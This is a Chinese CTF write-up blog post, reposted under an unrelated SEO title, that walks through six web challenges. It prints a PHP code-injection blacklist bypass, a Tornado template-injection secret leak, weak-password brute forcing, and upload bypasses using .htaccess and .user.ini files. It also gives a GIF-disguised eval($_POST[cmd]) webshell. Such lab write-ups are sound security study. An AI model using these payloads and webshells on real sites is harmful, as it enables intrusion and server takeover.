天津网站制作系统网站域名续费后SEO查询未更换

pingmian/2026/1/22 17:31:44/文章来源:
天津网站制作系统,网站域名续费后SEO查询未更换,门户网站的种类,wordpress ie很慢#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收藏 … 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 目录 1、[RoarCTF 2019]Easy Calc 2、[极客大挑战 2019]BuyFlag 3、[HCTF 2018]admin 4、[护网杯 2018]easy_tornado handler.settings 5、[GXYCTF2019]BabyUpload .htaccess木马 6、[SUCTF 2019]CheckIn .user.ini木马 1、[RoarCTF 2019]Easy Calc flag{3d1e3a7c-463d-4cc0-b976-3e3fbe8b1894} 打开链接发现是一个输入框我们可以尝试sql注入但是我尝试了很多发现一输入字符串就报错了所以这里应该不是sql注入漏洞。 我们这里右击查看网页源代码 源代码解释 通过 jQuery 选择器 $(#calc) 监听表单提交事件并在提交时执行指定的函数。在提交事件中通过 $.ajax() 发起一个 GET 请求到 calc.php请求参数 num 的数值来自于输入框 #content 的值并对其进行 URL 编码。如果请求成功success 回调函数会将返回的数据插入到具有绿色背景色的提示框中并显示在页面上。如果请求失败error 回调函数会弹出一个警告框提示这啥?算不来!。返回 false 会阻止表单的默认提交行为。 我们根据提示访问calc.php/目录发现是一段php代码审计 通过上面的分析我们构造下面的payload calc.php? numprint_r(scandir(/)); //中间记得有个空格请求参数 num 中的值 print_r(scandir(/)); 包含了括号和分号等符号这些符号在黑名单中因此会导致代码检测到黑名单字符而触发拒绝执行的逻辑最终输出 “what are you want to do?” 错误信息。 那我们利用ASCII 值进行过滤payload如下 calc.php? numprint_r(scandir(chr(47)));使用了 chr(47) 函数来生成 ASCII 值为 47 的字符ASCII 值为 47 对应于斜杠 /。这样产生的结果和直接输入 / 是等价的。 输入后 可以浏览根目录下的文件而其中的falgg就是我们要读取的文件 ? numprint_r(file_get_contents(/flagg));其中/flagg 用chr进行绕过? numprint_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))); 2、[极客大挑战 2019]BuyFlag flag{6a2a46b6-6901-4548-828a-cce53bffab0a} 打开链接访问右上角点击然后再点击PAYFLAG按钮 没猜错的话这个就是一个购买flag的功能点位置 右击查看网页源代码发现一个注释的php代码审计 通过上面的php代码审计我们可以利用password进行post传参然后对is_numeric()进行过滤我们可以用 404abc进行过滤 但是我无论怎么输入他都报这个错误并且没有回显别的内容说 只有Cuit的学生才能购买Flag我们猜测用户和cookie是相关联的那么我们对用户的cookie进行查看 一看发现cookie值是0那么我改成1再进行下一步 password404abc他让我支付flag我们利用money参数进行支付 password404abcmoney100000000报错说我们的money估计金额被限制了用数组绕一下 password404abcmoney[]1我们成功买到了flagflag{6a2a46b6-6901-4548-828a-cce53bffab0a} 3、[HCTF 2018]admin flag{648fbcf7-1bf7-465d-a7eb-33ffe0a5b31f} 打开题目我们直接点击登录login页面题目提示admin说明这个题目要拿到admin用户才可以查看到flag。 我们这里利用burp工具抓包尝试下密码破解直接设置123为爆破对象 load选择字典一般可以去网上找弱口令的爆破字典GitHub上面还是蛮多的。 发现爆破成功了密码就是123属于弱口令 成功拿到flag{648fbcf7-1bf7-465d-a7eb-33ffe0a5b31f} 4、[护网杯 2018]easy_tornado flag{4f63ee96-1064-4a5e-8d16-d92314041e1a} 一打开环境发现存在三个.txt文件 /flag.txt中告诉我们flag在 /fllllllllllllag里面 /welcome.txt文件里面没有什么直接价值的信息 在hints.txt文件中发现md5计算md5(cookie_secretmd5(filename)) 在hints.txt文件中发现md5计算md5(cookie_secretmd5(filename)) 并且三个文件中都存在filehash文件名被哈希算法加密32位小写 所以filehash就是md5(cookie_secretmd5(filename)) 然后filename就是/fllllllllllllag 现在只缺cookie_secret这个东西只要有了cookie_secret再通过这个md5(cookie_secretmd5(filename))公式进行计算即可获取到flag 查看题目的名字tornado是python的一个模板可以看出这道题是模板注入类的题目 通过修改filehash发现报error的错 模板注入必须通过传输型如{{xxx}}的执行命令 /error?msg{{3*3}}发现总是报ORZ说明这个就是tornado模板注入 handler.settings 在 Tornado 中handler.settings 是一个字典用于存储和访问应用程序的设置信息。这个字典通常在 Tornado 的 RequestHandler 中使用用于配置和传递应用程序的各种参数。 通过handler.settings可以在处理请求的过程中访问和使用应用程序的配置信息例如数据库连接信息、API 密钥、模板路径等。这样做的好处是可以将应用程序的配置信息集中管理便于维护和修改。 开发者可以在创建 Tornado 的 Application 对象时通过传递 settings 参数来设置这些配置信息然后在 RequestHandler 中通过 handler.settings 来获取并使用这些信息。例如 # 创建 Tornado 应用程序时传入配置信息 app tornado.web.Application(handlers[(r/, MainHandler)], settings{debug: True,database: {host: localhost,port: 3306,user: root,password: password} })# 在 RequestHandler 中访问配置信息 class MainHandler(tornado.web.RequestHandler):def get(self):debug_mode self.settings.get(debug)db_host self.settings.get(database).get(host)self.write(fDebug Mode: {debug_mode}, Database Host: {db_host})通过handler.settings可以方便地在 Tornado 应用程序中管理和使用各种配置参数提高代码的可维护性和灵活性。 爆cookie_secret error?msg{{handler.settings}} 得到cookie_secret447c8b25-6c6b-4229-8569-d6284192087e 按照公式进行加密 公式md5(cookie_secretmd5(filename))b0b99193d1ce9c809265a3b6c4950133 最终payload file?filename/fllllllllllllagfilehashb0b99193d1ce9c809265a3b6c4950133 成功拿到flag{4f63ee96-1064-4a5e-8d16-d92314041e1a} 5、[GXYCTF2019]BabyUpload 这是一道文件上传的题目我们先来尝试上传一个php后缀的木马上去看看报错内容后缀名不能有ph 发现后缀是不可以有ph了所以说什么双写绕过phtml大小写绕过都没有用只能改后缀了所以就想到只能用.htaccess文件进行文件上传了。 .htaccess木马文件内容(xiaoma.jpg为到时候后面进行木马上传jpg木马的文件名因为这个.htaccess木马就是把xiaoma.jpg里面的内容当初php代码来执行) FilesMatch xiaoma.jpgSetHandler application/x-httpd-php /FilesMatch.htaccess木马 第一步 右击发送两个包到repeater里面我们后面要进行绕过。 第二步 发现我们上传的.htaccess木马被暴露了经过尝试发现是Content-Type: 的原因我们直接把Content-Type: 里面的内容改成jpg的 /image/jpeg并且加上图片头GIF89a 发现文件上传成功了 第三步 我们写正常的一句话木马竟然直接被它给识别出来了应该是里面有?php过滤了那么我们换个木马进行绕过。 xiaoma.jpg木马我们要把第二次发包的那个包里面的.htaccess名字改成xiaoma.jpg GIF89a script languagephp eval($_POST[cmd]);phpinfo(); /script发现上传成功了我们直接连接蚁剑查看flag 第四步 连接蚁剑查看flag 6、[SUCTF 2019]CheckIn flag{8efd51f4-988b-48b9-b1d2-c5888c2771b0} 题目是个文件上传我们先上传一个xiaoma.jpg上去探测题目过滤内容 GIF89a ?php eval($_POST[cmd]); ?报的这个错说明对?php进行了过滤我们需要对一句话木马进行修改 GIF89a script languagephp eval($_POST[cmd]);phpinfo(); /script我们把木马后缀进行了修改发现题目对ph进行了过滤我开始尝试了利用.htaccess木马文件进行绕过发现.htaccess确实是可以绕过但是发现那个木马文件不能呗执行成php木马执行让getshell。 这里我们利用.user.ini文件进行绕过。 .user.ini木马 php.ini是php的一个全局配置文件对整个web服务起作用而.user.ini和.htaccess一样是目录的配置文件.user.ini就是用户自定义的一个php.ini我们可以利用这个文件来构造后门和隐藏后门。 GIF89a auto_prepend_filexiaoma.jpg第一步 先上传.user.ini木马然后再重发两个包到Repeater里面然后再改Content-Type: image/jpeg 发现上传成功了。 第二步 把刚才重发的第二个包修改然后上传。 第三步 访问xiaoma.jpg那个上传成功包的目录位置发现木马被成功执行了。 第四步 连接蚁剑然后getshell查看flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/86762.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站建设推广价格wordpress换行

文章目录 **项目功能简介:****点餐系统分为前台和后台****前台功能介绍:****后台功能介绍:** **论文截图:****实现:****代码片段:** 编程技术交流、源码分享、模板分享、网课教程 🐧裙:77687156…

网络营销建设网站实训网站建设技术规范

参考链接:https://www.cnblogs.com/0yst3r-2046/p/12172757.html 仿射加密法 在仿射加密法中,字母表的字母被赋予一个数字,例如 a0,b1,c2…z25 。仿射加密法的密钥为0-25直接的数字对。 仿射加密法与单码加密法没什么…

重庆官方网站查询系统苏州公司

🍨 本文为🔗365天深度学习训练营 中的学习记录博客🍖 原作者:K同学啊 | 接辅导、项目定制 文章目录 前言1 我的环境2 代码实现与执行结果2.1 前期准备2.1.1 引入库2.1.2 设置GPU(如果设备上支持GPU就使用GPU,否则使用C…

网站粘度html登录界面设计

centos关机命令: 1、halt 立马关机 2、shutdown -h 10 1分钟后自动关机 3、poweroff 立刻关机,并且电源也会断掉 4、shutdown -h now 立刻关机(root用户使用) 如果是通过shutdown命令设置关机的话,可以用shutdown -c命令取消重启转载于:https://www.cnbl…

杭州下沙网站建设帝国cms建网站

从3.1版开始, Spring框架提供了对几种不同来源的抽象,通过它们您可以轻松地配置应用程序: Environment 。 在这篇文章中,我描述了一个微基准测试,我可以证明该基准测试是一个方便的API(如果您在应用程序中…

上海企业建站流程电子商务专业就业方向女生

为什么要迁移,江湖上传说windows server的稳定性不如某某某,这类议题与八卦新闻没两样,不谈,如果windows的价钱能够和linux相同或者差异不至于那么大,我才懒得换,因为穷,这才是重点。 涉及IO路径…

如何降低网站的权重wordpress底部版权信息修改

目录 前言 一、 数据预处理与清洗 二、常见可视化技术 三、可视化工具和平台 博主介绍:✌专注于前后端、机器学习、人工智能应用领域开发的优质创作者、秉着互联网精神开源贡献精神,答疑解惑、坚持优质作品共享。本人是掘金/腾讯云/阿里云等平台优质作者…

温州市建设工程招投标网站wordpress transient

1、内容简介 略 46-可以交流、咨询、答疑 2、内容说明 略 4 取标段的分析 取标装置是贴标机的核心部件之一,是影响贴标质量和贴标精度的重要因素,取标段是通过取标板与标签的相切运动使得涂有胶水的取标板从标签盒中粘取标签纸[4],理论…

查询商品价格走势的网站百度网站置顶怎么做

电脑快捷键 Tab键 等于六个空格 Alt键 Alt加上F4关闭当前窗口 Ctrl键 Ctrl加S保存 shift键 shift加delete永久性的删除(不会出现在回收站中) win win加E打开我的电脑 win加tab桌面多窗口预览,切换 其他 cmd打开命令行窗口 任务管理器结束进程后 cmd输入explorer可…

自动做简历的网站免费域名空间服务

1、supervisorctl: 这是Supervisor提供的命令行客户端,Supervisor是一个进程控制系统。它用于在UNIX类操作系统上控制和监视进程。它通常用于服务器环境中管理长时间运行的进程。 Supervisor 是一个用于监控和控制 UNIX 系统上的进程的程序。它不是大多…

专注网站建设11年网站建设有哪些环节

onload事件是在网页中的所有内容(包括图片、样式表、脚本等)都加载完成后触发的事件。它常用于在页面加载完成后执行一些操作,例如初始化页面元素、绑定事件监听器等。 可以通过以下方式来使用onload事件: 在HTML标签中直接添加…

怎么样给自己做网站静态网页制作视频教程

文章目录 第一步:在项目public文件夹下创建一个login.html,其实就是将index.html复制一份,将title改一下:login.html 第二步:在src文件夹下创建一个login文件夹,分别创建login.main.js、login.router.js、l…

毕业设计博客网站开发女孩子做网站推广

一、Linux 常见的登录档档名登录档可以帮助我们瞭解很多系统重要的事件,包括登入者的部分资讯,因此登录档的权限通常是设定为仅有 root 能够读取而已。 而由于登录档可以记载系统这麽多的详细资讯,所以啦,一个有经验的主机管理员会…

长春网站开发培训什么是cms网站系统

头像解码库:libwlt2bmp.so 照片文件名:photo.bmp 原始身份证相片数据:574C66007E00320000F........(此处省略) 调用身份证阅读器Linux开发包,然后调用libwlt2bmp.so解码库文件,传入身份证原始…

东莞定制网站开发建立网站需要哪几个

目录 引言游戏背景介绍游戏规则游戏设计与实现开发环境与工具游戏界面设计游戏逻辑实现游戏优化和测试性能优化测试工具和流程说明引言 俄罗斯方块是一款经典的益智游戏,深受玩家喜爱。本文将介绍如何使用C#编程语言制作一个简单的俄罗斯方块小游戏,并探讨其设计与实现过程。…

天目西路网站建设德州做网站建设的公司

关于手机Charge,小白在以前的文章很少讲,一是这部分东西太多,过于复杂。二是总感觉写起来欠缺点什么。但后来想一想,本是抱着互相学习来写文章的心理态度,还是决定尝试写一些。 关于今天要讲的关于手机Charge的内容&a…

建设大型购物网站做外贸用什么平台

9.环形链表 141. 环形链表 - 力扣(LeetCode) /* 解题思路: 定义快慢指针fast,slow, 如果链表确实有环,fast指针一定会在环内追上slow指针。 */typedef struct ListNode Node; bool hasCycle(struct ListNode *head) {Node* slow …

做网站公司徐汇网站建设项目验收报告

文 | python编 | 小轶前言不知诸位在科研的起步阶段,是否曾有过如下的感受:总感觉自己写的论文就是和自己读过的论文长得不太一样,也不知道为啥。投稿的时候,审稿人也总是 get 不到论文的核心,只揪着论文的次要细节不放…

音乐排行榜网页设计作业深圳整站seo

PHP原始为Personal Home Page的缩写,已经正式更名为 “PHP: Hypertext Preprocessor”。PHP即“超文本预处理器”,是一种通用开源脚本语言。PHP是在服务器端执行的脚本语言,与C语言类似,是常用的网站编程语言。PHP独特的语法混合了…

芜湖服装网站建设怎样用云服务器做网站

本篇博客只是作为个人记录,拆锂电池有危险,撬棒刺穿外壳可能爆炸,请勿模仿,误操作电池数据可能失效,请勿模仿。 1、简介 1.1、目的 得到该电池的电量计芯片型号、IIC从机地址、通信的实际波形; 1.2、步…